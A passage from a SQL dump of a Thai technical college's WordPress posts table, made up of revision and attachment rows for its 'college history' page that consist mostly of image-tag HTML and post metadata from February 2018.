style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></p>\r\n\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"aligncenter wp-image-1214 size-full\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n \r\n\r\n-<img class=\"wp-image-1205 size-medium aligncenter\" src=\"/wp-content/uploads/2018/02/1-1-300x211.jpg\" alt=\"\" width=\"300\" height=\"211\" /><img class=\"wp-image-1208 size-medium aligncenter\" src=\"/wp-content/uploads/2018/02/2-300x217.jpg\" alt=\"\" width=\"300\" height=\"217\" />\r\n\r\n<img class=\"wp-image-1207 size-medium aligncenter\" src=\"/wp-content/uploads/2018/02/3-300x213.jpg\" alt=\"\" width=\"300\" height=\"213\" />\r\n\r\n<img class=\"wp-image-1206 size-medium aligncenter\" src=\"/wp-content/uploads/2018/02/4-300x230.jpg\" alt=\"\" width=\"300\" height=\"230\" />', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-19 14:12:10', '2018-02-19 07:12:10', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1216, 3, '2018-02-19 14:14:28', '2018-02-19 07:14:28', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"wp-image-1200 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"wp-image-1204 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"size-medium wp-image-1203 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /><img class=\"size-medium wp-image-1201 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n<h3></h3>\r\n<img class=\"size-medium wp-image-1202 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"wp-image-1205 size-medium aligncenter\" src=\"/wp-content/uploads/2018/02/1-1-300x211.jpg\" alt=\"\" width=\"300\" height=\"211\" /><img class=\"wp-image-1208 size-medium aligncenter\" src=\"/wp-content/uploads/2018/02/2-300x217.jpg\" alt=\"\" width=\"300\" height=\"217\" />\r\n\r\n<img class=\"wp-image-1207 size-medium aligncenter\" src=\"/wp-content/uploads/2018/02/3-300x213.jpg\" alt=\"\" width=\"300\" height=\"213\" />\r\n\r\n<img class=\"wp-image-1206 size-medium aligncenter\" src=\"/wp-content/uploads/2018/02/4-300x230.jpg\" alt=\"\" width=\"300\" height=\"230\" />', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-19 14:14:28', '2018-02-19 07:14:28', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1218, 3, '2018-02-19 14:34:38', '2018-02-19 07:34:38', '', '19-2-2561 14-35-59', '', 'inherit', 'closed', 'closed', '', '19-2-2561-14-35-59', '', '', '2018-02-19 14:34:38', '2018-02-19 07:34:38', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg', 0, 'attachment', 'image/jpeg', 0),
(1219, 3, '2018-02-19 14:36:37', '2018-02-19 07:36:37', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"wp-image-1200 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"wp-image-1204 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"size-medium wp-image-1203 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /><img class=\"size-medium wp-image-1201 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n<h3></h3>\r\n<img class=\"size-medium wp-image-1202 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"alignnone wp-image-1218\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1200\" height=\"565\" />', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-19 14:36:37', '2018-02-19 07:36:37', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1221, 3, '2018-02-19 16:13:49', '2018-02-19 09:13:49', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"wp-image-1200 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"wp-image-1204 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"size-medium wp-image-1203 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /><img class=\"size-medium wp-image-1201 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n<h3></h3>\r\n<img class=\"size-medium wp-image-1202 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"alignnone wp-image-1218\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1200\" height=\"565\" />\r\n\r\n<img class=\"wp-image-1220 size-full alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26.jpg\" alt=\"\" width=\"1034\" height=\"515\" />', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-19 16:13:49', '2018-02-19 09:13:49', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1222, 3, '2018-02-19 16:16:15', '2018-02-19 09:16:15', '', '19-2-2561 16-13-26', '', 'inherit', 'closed', 'closed', '', '19-2-2561-16-13-26', '', '', '2018-02-19 16:16:15', '2018-02-19 09:16:15', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/19-2-2561-16-13-26.jpg', 0, 'attachment', 'image/jpeg', 0),
(1223, 3, '2018-02-19 16:22:02', '2018-02-19 09:22:02', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"wp-image-1200 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"wp-image-1204 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"size-medium wp-image-1203 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /><img class=\"size-medium wp-image-1201 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n<h3></h3>\r\n<img class=\"size-medium wp-image-1202 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"wp-image-1218 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"wp-image-1222 aligncenter\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26.jpg\" alt=\"\" width=\"1078\" height=\"529\" />', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-19 16:22:02', '2018-02-19 09:22:02', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1224, 3, '2018-02-19 16:28:33', '2018-02-19 09:28:33', '', '19-2-2561 16-13-26', '', 'inherit', 'closed', 'closed', '', '19-2-2561-16-13-26-2', '', '', '2018-02-19 16:28:33', '2018-02-19 09:28:33', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(1225, 3, '2018-02-19 16:29:07', '2018-02-19 09:29:07', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"wp-image-1200 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"wp-image-1204 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"size-medium wp-image-1203 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /><img class=\"size-medium wp-image-1201 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n<h3></h3>\r\n<img class=\"size-medium wp-image-1202 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" />', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-19 16:29:07', '2018-02-19 09:29:07', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1228, 3, '2018-02-20 11:17:19', '2018-02-20 04:17:19', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"wp-image-1200 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"wp-image-1204 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"size-medium wp-image-1203 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /><img class=\"size-medium wp-image-1201 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n<h3></h3>\r\n<img class=\"size-medium wp-image-1202 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" />\r\n\r\n<img class=\"aligncenter wp-image-1226 size-full\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1082\" height=\"580\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-20 11:17:19', '2018-02-20 04:17:19', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1230, 3, '2018-02-20 11:22:03', '2018-02-20 04:22:03', '', '20-2-2561 11-17-30', '', 'inherit', 'closed', 'closed', '', '20-2-2561-11-17-30', '', '', '2018-02-20 11:22:03', '2018-02-20 04:22:03', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg', 0, 'attachment', 'image/jpeg', 0),
(1231, 3, '2018-02-20 11:24:04', '2018-02-20 04:24:04', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"wp-image-1200 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"wp-image-1204 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"size-medium wp-image-1203 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /><img class=\"size-medium wp-image-1201 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n<h3></h3>\r\n<img class=\"size-medium wp-image-1202 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-20 11:24:04', '2018-02-20 04:24:04', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1232, 3, '2018-02-20 11:26:43', '2018-02-20 04:26:43', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n<a href=\"http://www.technicrayong.ac.th/%E0%B9%80%E0%B8%AD%E0%B8%81%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n<h3></h3>\r\n<a href=\"http://www.technicrayong.ac.th/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" 